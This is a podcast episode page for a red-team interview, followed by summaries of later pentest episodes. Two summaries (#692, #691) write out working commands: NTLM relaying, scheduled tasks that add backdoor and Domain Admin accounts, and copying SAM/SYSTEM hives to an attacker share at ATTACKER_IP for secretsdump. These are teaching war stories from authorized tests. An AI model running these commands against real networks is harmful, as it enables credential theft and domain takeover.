7MS #386: Interview with Ryan Manship and Dave Dobrotka - Part 4
7 Minute Security1 Marras 2019

7MS #386: Interview with Ryan Manship and Dave Dobrotka - Part 4

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I'm sorry it took me forever and a day to get this episode up, but I'm thrilled to share part 4 (the final chapter - for now anyways) of my interview with the red team guys, Ryan and Dave!

In today's episode we talk about:

  • Running into angry system admins (that are either too fired up or not fired up enough)
  • Being wrong without being ashamed
  • When is it necessary to make too much noice to get caught during an engagement?
  • What are the top 5 tools you run on every engagement?
  • How do you deal with monthly test reports indefinitely being a copy/paste of the previous month's report?
  • How do you deal with clients who scope things in such as way that the test is almost impossible to conduct?
  • How do you deal with colleagues who take findings as their own when they talk with management?
  • How do you work with clients who don't know why they want a test - except to check some sort of compliance checkmark?
  • What is a typical average time to complete a pentest on a vendor (as part of a third-party vendor assessment)?
  • How could a fresh grad get into a red team job?
  • What do recruiters look for candidates seeking red team positions?
  • If a red team is able to dump a whole database of hashes or bundle of local machine hashes, should they crack them?
  • What do you do when you're contracted for a pentest, but on day one your realize the org is not at all ready for one?
  • What's your favorite red team horror story?

Jaksot(499)

7MS #695: Tales of Pentest Pwnage - Part 78

7MS #695: Tales of Pentest Pwnage - Part 78

Today’s tale of pentest pwnage involves: Using mssqlkaren to dump sensitive goodies out of SCCM Using a specific fork of bloodhound to find machines I could force password resets on (warning: don’t do this in prod…read this!) Don’t forget to check out our weekly Tuesday TOOLSday – live every Tuesday at 10 a.m. over at 7MinSec.club!

3 Loka 15min

7MS #694: Tales of Pentest Pwnage – Part 77

7MS #694: Tales of Pentest Pwnage – Part 77

Hey friends, today I talk about how fun it was two combine two cool pentest tactics, put them in a blender, and move from local admin to mid-tier system admin access (with full control over hundreds of systems)! The Tuesday TOOLSday video we did over at 7minsec.club will help bring this to life as well.

26 Syys 33min

7MS #693: Pwning Ninja Hacker Academy – Part 3

7MS #693: Pwning Ninja Hacker Academy – Part 3

This week your pal and mine Joe “The Machine” Skeen kept picking away at pwning Ninja Hacker Academy.  To review where we’ve been in parts 1 and 2: We found a SQL injection on a box called SQL, got a privileged Sliver beacon on it, and dumped mimikatz info From that dump, we used the SQL box hash to do a BloodHound run, which revealed that we had excessive permissions over the Computers OU We useddacledit.py to give ourselves too much permission on the Computers OU Today we: Did an RBCD attack against the WEB box Requested a service ticket to give us local admin superpowers on WEB Performed a secretsdump against WEB Struggled to do a mimikatz dump at the end of the episode (after we ended the stream I realized I could’ve just done the mimikatz dump because I had local admin access!  Oh well, we’ll pick things up again during part 4 next month!)

19 Syys 28min

7MS #692: Tales of Pentest Pwnage – Part 76

7MS #692: Tales of Pentest Pwnage – Part 76

Happy Friday! Today’s another hot pile of pentest pwnage. To make it easy on myself I’m going to share the whole narrative that I wrote up for someone else: I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/. I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can’t explain is the first relay got me a shell in the context of NT SERVICE\MSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITY\SYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance". Turns out a DA wasn’t interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn’t copy reg hives out of it – EDR was unhappy. In the end, the bizarre combo of things that did the trick was: Setup smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!' From the victim system, I did an mklink to the shadow copy: mklink /d C:\tempbackup \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy123\ From command prompt on the victim system, I authenticated to my rogue share: net use \\ATTACKER_IP\share /user:toteslegit DontMindMeLOL! Then I did a copy command for the first hive: copy SYSTEM \\my.attackingip\sys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed! I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!! Finishing move: secretsdump -sam sam.test -system sys.test LOCAL

12 Syys 32min

7MS #691: Tales of Pentest Pwnage – Part 75

7MS #691: Tales of Pentest Pwnage – Part 75

Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today’s episode: Got an SA account to a SQL server through Snaffler-ing With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv I didn’t have a machine account under my control, so I did SPNless RBCD on my lowpriv account – read more about that here Using that technique, I requested a host service ticket for the SQL box, then used evil-winrm to remote in using the ticket From there I checked out who had interactive logons: Get-Process -IncludeUserName explorer | Select-Object UserName Then I queued up a fake task to elevate me to DA: schtasks /create /tn "TotallyFineTask" /tr 'net group "Domain Admins" lowpriv /add /domain' /sc once /st 12:00 /ru "DOMAIN\a-domain-admin" /it /f …and ran it: schtasks /run /tn "TotallyFineTask"

5 Syys 31min

7MS #690: Tales of Pentest Pwnage – Part 74

7MS #690: Tales of Pentest Pwnage – Part 74

Today’s tale of pentest pwnage is a classic case of “If your head is buried in the pentest sand, pop it out for a while, touch grass, and re-enumerate what you’ve already enumerated, because that can lead to absolute GOLD!”

29 Elo 21min

7MS #689: Pwning Ninja Hacker Academy – Part 2

7MS #689: Pwning Ninja Hacker Academy – Part 2

Hello friends!  Today your friend and mine, Joe “The Machine” Skeen joins me as we keep chipping away at pwning Ninja Hacker Academy!  Today’s pwnage includes: “Upgrading” our Sliver C2 connection to a full system shell using PrintSpoofer! Abusing nanodump to do an lsass minidump….and find our first cred. Analyzing BloodHound data to find (and own) excessive permissions against Active Directory objects

22 Elo 15min

7MS #688: Building a Pentest Training Course Is Fun and Frustrating

7MS #688: Building a Pentest Training Course Is Fun and Frustrating

Today I talk about a subject I love while also driving me crazy at the same time: building a pentest training course! Specifically, I dissect a fun/frustrating GPO attack that I need to build very carefully so that every student can pwn it while also not breaking the domain for everybody else. I also talk about how three different flavors of AI failed me in solving a simple task.

16 Elo 22min

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